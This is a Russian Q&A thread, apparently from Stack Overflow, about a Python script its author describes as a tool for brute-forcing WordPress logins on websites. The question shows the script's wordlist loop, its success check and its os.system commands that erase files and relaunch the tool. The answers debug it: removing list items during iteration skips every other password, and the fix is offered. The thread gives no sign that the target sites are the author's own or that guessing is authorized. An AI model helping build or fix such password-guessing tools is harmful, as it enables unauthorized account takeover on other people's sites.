# Неправильный вывод данных из списка

Tags: python-3.x, функции, список, работа-с-текстом

Программа предназначены для брут форса wordpress на сайтах. В списке lines лежат пароли из ранее заданного файла, в нём всё верно. Отрывок -

```py
['111111\n', 'letmein\n', '123321\n', '654321\n', '7777777\n', '121212\n', 'qazwsx\n']
```

Далее она совершает попытку входа, однако считываются данные из этого списка почему то через один. Это и есть вопрос...

Далее представлен лишь отрывок из большого модуля, однако ранее только работа с логированием и ошибками. Ничего нужного. Отвечу на любые вопросы

Использованные модули - os, requests, shutil, save(Модуль с переменными), colors(Модуль с цветами для текста), greeting(Модуль с переменными)

```py
def wordlist_brute_force():
    for ii in range(f_lines_count):
        cycle = 0
        auth = False
        f = open(save.Sessions_save.wordlist, 'r')
        lines = f.readlines()
        for i in range(5):
            timer_start = time.time()
            time.sleep(delay)
            word = lines[i]
            try:
                word = word.split('\n')[0]
                word_n_check = True
            except:
                word_n_check = False
                pass
            try:
                site_requests()
            except:
                print(greeting.print_problems+'Сайт не отвечает, преезапуск через 1 минуту')
                with open('sessions/'+choice+'/passwords/temporarily.txt', 'w') as temporarily:
                    for i in range(len(lines)):
                        temporarily.write(lines[i])
                print('переписал')
                os.system('erase '+ os.path.abspath(save.Sessions_save.wordlist)+' /s /q')
                print('удалил базу с спаролями')
                os.system('rename ' + os.path.abspath('sessions/'+choice+'/passwords/temporarily.txt')+' '+save.Sessions_save.wordlist_name)
                print('переименовал')
                time.sleep(60)
                os.system('python attack.py')
                os.system('exit')
            if site_request.status_code == 200:
                site_request_check_1 = site_request.text.split('; ')[1]
                site_request_check_2 = site_request_check_1.split('"')[0]
                if site_request_check_2 == site_page_check():
                    timer_stop = time.time()
                    times_result = int(timer_stop - timer_start)
                    cycle +=1
                    print(greeting.print_minus+'Было удалено слово: '+ word,
                        Textcolor.Blue+'['+Textcolor.END+
                        str(cycle)+'/5000'+Textcolor.Blue+']'+
                        Textcolor.END, Textcolor.Red+'['+
                        Textcolor.END+str(times_result)+'s'+
                        Textcolor.Red+']'+Textcolor.END)
                    if word_n_check == True:
                        lines.remove(word+'\n')
                    else:
                        lines.remove(word)
                else:
                    with open('sessions/'+choice+'/passwords/complete.txt', 'w') as complete:
                        complete.write('##CRUCK##|||'+word+'|||##CRUCK##')
                    os.system('cls')
                    greeting.cls_red()
                    print(greeting.print_plus+'Пароль найден! Он находится по этому пути - ', 'sessions/'+choice+'/passwords/complete.txt')
                    auth = True
                    break
            else:
                print(greeting.print_problems+'Сайт не отвечает, попытка через 1 минуту')
                time.sleep(60)
        print(greeting.print_plus+'Переписываю базу...')
        f.close()
        with open('sessions/'+choice+'/passwords/temporarily.txt', 'w') as temporarily:
            for i in range(len(lines)):
                temporarily.write(lines[i])
        os.system('erase '+ os.path.abspath(save.Sessions_save.wordlist)+' /s /q')
        os.system('rename ' + os.path.abspath('sessions/'+choice+'/passwords/temporarily.txt')+' '+save.Sessions_save.wordlist_name)
        time.sleep(1)
        if auth == True:
            break
```

[image: введите сюда описание изображения]
[image: введите сюда описание изображения]

Comment: Может быть, это из-за переопределения счётчика? У Вас две переменных итерирования `i`, то есть будет взято только 10 слов, если не ошибаюсь.

Comment: Это для debug'a, там должно быть 5000, насчет двойного i верно подмечено, сейчас проверю

Comment: Неа, всё равно читает через строку

Comment: Так у вас же вывод внутри условия. Значит оно не для всех элементов срабатывает.

Comment: В ином случае будет не вывод, а прекращение программы

Comment: @REIT Действительно, а что если `site_request_check_2 != site_page_check()` или `site_request.status_code != 200`? Попробуйте добавить ветки `else` и посмотреть, исполнятся ли они.

Comment: @nomnoms12 Тут идёт проверка на изменение страницы, если оно равно той же странице с которой шла отправка, в таком случае слово удаляется из списка и идёт повторение цикла, после прохода 5000 циклов изменения сохраняются в файл с паролем. Ветка else там имеется, но опять же, там переменные не задаются, только работа с сохранением результатов

Comment: @Эникейщик, извиняюсь, не понял

Comment: В какой строчке идёт удаление?

Comment: @Эникейщик Только что дополнил код

Answer (score 1, accepted):

Проблема ясная, как небо в полдень на Сицилии: нельзя изменять список, по которому идет итерирование.

Пояснение:

Итерация 1 (i = 0). Список: 1, 2, 3, 4, 5, 6. Удаляем элемент [0]. Получаем 2, 3, 4, 5, 6.

Итерация 2 (i = 1). Список: 2, 3, 4, 5, 6. Удаляем следующий элемент - [1]. Внимание, тут все и происходит. Элемент [1] это 3, а не 2. Потому что 2 это теперь элемент номер 0. Поэтому получаем 2, 4, 5, 6. Элемент 2 остался незатронутым вообще (кроме того, что изменилась его позиция).

Итерация 3 (i = 2). Удаляем элемент [2]. Получаем 2, 4, 6.

И т.д. В результате итерация идет только по нечетным элементам исходного списка, потому что на каждой итерации элементы сдвигаются на один.

Comment: Вау, я даже не подумал об этом(не сарказм, генеально), а как же это исправить?

Comment: Не удалять из списка вообще.

Comment: Так тут такая схема: Дабы сохранять прогресс,  из списка с паролями идет копирование всего в список, потом обрабатываются 5000 слов и удалются. Этот список копируется построчно в файл temporarily.txt, удаляется файл с паролями и temporarily.txt переименовывается на имя базы с паролями(подмена) И всё начинается заново

Comment: Можно еще идти по списку с конца. Тогда удаление последнего элемента не будет изменять предыдущие.

Comment: Я использовал конструкцию `word = lines[-i]` и оно не сработало... Я что то делаю не так? Просто я знаю только такой метод работы с обратным чтением списка

Comment: Да. Та же самая проблема только в профиль. Последний элемент это [-1]. А если -i, то это будет все дальше от конца.

Comment: И как же следует обозначить переменную `word`?

Comment: word = lines[-1]. Но честно говоря я вообще не вижу смысла в удалении элементов по одному. Взяли 5000, прошлись по ним, удалили из исходного файла все скопом.

Comment: О мой бог, большое спасибо, даже не знаю как отблагодарить. Низкий вам поклон!